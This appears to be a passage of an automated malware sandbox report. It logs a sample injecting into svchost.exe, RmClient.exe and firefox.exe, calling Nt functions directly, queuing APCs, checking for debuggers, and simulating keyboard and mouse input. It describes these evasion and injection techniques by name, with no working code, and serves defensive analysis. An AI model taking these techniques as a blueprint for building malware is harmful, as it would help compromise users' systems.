Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h] 2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h] 2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h] 2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h] 2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h] 2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h] 2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h] 2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h] 2_2_03638BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h] 2_2_03638BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h] 2_2_03638BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365EBFC mov eax, dword ptr fs:[00000030h] 2_2_0365EBFC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036BCBF0 mov eax, dword ptr fs:[00000030h] 2_2_036BCBF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h] 2_2_03650BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h] 2_2_03650BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h] 2_2_03650BCB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h] 2_2_03630BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h] 2_2_03630BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h] 2_2_03630BCD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DEBD0 mov eax, dword ptr fs:[00000030h] 2_2_036DEBD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h] 2_2_03640BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h] 2_2_03640BBE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h] 2_2_036E4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h] 2_2_036E4BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h] 2_2_0366CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h] 2_2_0366CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h] 2_2_0366CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036DEA60 mov eax, dword ptr fs:[00000030h] 2_2_036DEA60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h] 2_2_036ACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h] 2_2_036ACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h] 2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h] 2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h] 2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h] 2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h] 2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h] 2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h] 2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h] 2_2_03640A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h] 2_2_03640A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366CA24 mov eax, dword ptr fs:[00000030h] 2_2_0366CA24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0365EA2E mov eax, dword ptr fs:[00000030h] 2_2_0365EA2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h] 2_2_03654A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h] 2_2_03654A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366CA38 mov eax, dword ptr fs:[00000030h] 2_2_0366CA38
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036BCA11 mov eax, dword ptr fs:[00000030h] 2_2_036BCA11
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h] 2_2_0366AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h] 2_2_0366AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h] 2_2_03686ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h] 2_2_03686ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h] 2_2_03686ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03630AD0 mov eax, dword ptr fs:[00000030h] 2_2_03630AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h] 2_2_03664AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h] 2_2_03664AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h] 2_2_03638AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h] 2_2_03638AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03686AA4 mov eax, dword ptr fs:[00000030h] 2_2_03686AA4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] 2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] 2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] 2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] 2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] 2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] 2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] 2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] 2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] 2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03704A80 mov eax, dword ptr fs:[00000030h] 2_2_03704A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03668A90 mov edx, dword ptr fs:[00000030h] 2_2_03668A90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03656962 mov eax, dword ptr fs:[00000030h] 2_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03656962 mov eax, dword ptr fs:[00000030h] 2_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03656962 mov eax, dword ptr fs:[00000030h] 2_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0367096E mov eax, dword ptr fs:[00000030h] 2_2_0367096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0367096E mov edx, dword ptr fs:[00000030h] 2_2_0367096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0367096E mov eax, dword ptr fs:[00000030h] 2_2_0367096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h] 2_2_036D4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h] 2_2_036D4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036BC97C mov eax, dword ptr fs:[00000030h] 2_2_036BC97C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B0946 mov eax, dword ptr fs:[00000030h] 2_2_036B0946
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03704940 mov eax, dword ptr fs:[00000030h] 2_2_03704940
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B892A mov eax, dword ptr fs:[00000030h] 2_2_036B892A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C892B mov eax, dword ptr fs:[00000030h] 2_2_036C892B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h] 2_2_036AE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h] 2_2_036AE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036BC912 mov eax, dword ptr fs:[00000030h] 2_2_036BC912
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03628918 mov eax, dword ptr fs:[00000030h] 2_2_03628918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03628918 mov eax, dword ptr fs:[00000030h] 2_2_03628918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036BE9E0 mov eax, dword ptr fs:[00000030h] 2_2_036BE9E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h] 2_2_036629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h] 2_2_036629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C69C0 mov eax, dword ptr fs:[00000030h] 2_2_036C69C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036649D0 mov eax, dword ptr fs:[00000030h] 2_2_036649D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036FA9D3 mov eax, dword ptr fs:[00000030h] 2_2_036FA9D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h] 2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036309AD mov eax, dword ptr fs:[00000030h] 2_2_036309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036309AD mov eax, dword ptr fs:[00000030h] 2_2_036309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B89B3 mov esi, dword ptr fs:[00000030h] 2_2_036B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h] 2_2_036B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h] 2_2_036B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h] 2_2_036BE872
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h] 2_2_036BE872
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h] 2_2_036C6870
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h] 2_2_036C6870
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03642840 mov ecx, dword ptr fs:[00000030h] 2_2_03642840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03660854 mov eax, dword ptr fs:[00000030h] 2_2_03660854
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03634859 mov eax, dword ptr fs:[00000030h] 2_2_03634859
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03634859 mov eax, dword ptr fs:[00000030h] 2_2_03634859
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h] 2_2_03652835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h] 2_2_03652835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h] 2_2_03652835
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 0_2_004238DA
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0041F250 SetUnhandledExceptionFilter, 0_2_0041F250
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041A208
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00417DAA

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtQuerySystemInformation: Direct from: 0x76EF48CC Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtOpenSection: Direct from: 0x76EF2E0C Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtQueryInformationToken: Direct from: 0x76EF2CAC Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtCreateFile: Direct from: 0x76EF2FEC Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtOpenFile: Direct from: 0x76EF2DCC Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtTerminateThread: Direct from: 0x76EF2FCC Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtOpenKeyEx: Direct from: 0x76EF2B9C Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtSetInformationProcess: Direct from: 0x76EF2C5C Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtCreateMutant: Direct from: 0x76EF35CC Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtResumeThread: Direct from: 0x76EF36AC Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtMapViewOfSection: Direct from: 0x76EF2D1C Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtProtectVirtualMemory: Direct from: 0x76EE7B2E Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtReadFile: Direct from: 0x76EF2ADC Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtDelayExecution: Direct from: 0x76EF2DDC Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtQueryInformationProcess: Direct from: 0x76EF2C26 Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtResumeThread: Direct from: 0x76EF2FBC Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtCreateUserProcess: Direct from: 0x76EF371C Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtWriteVirtualMemory: Direct from: 0x76EF490C Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtSetInformationThread: Direct from: 0x76EE63F9 Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtSetInformationThread: Direct from: 0x76EF2B4C Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe NtCreateKey: Direct from: 0x76EF2C6C Jump to behavior
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\RmClient.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: NULL target: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: NULL target: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Thread register set: target process: 3180 Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Thread APC queued: target process: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe Jump to behavior
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2DE5008 Jump to behavior
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00436CD7 LogonUserW, 0_2_00436CD7
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D590
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00434418
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event, 0_2_0043333C
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\enkJ6J7dAn.exe" Jump to behavior
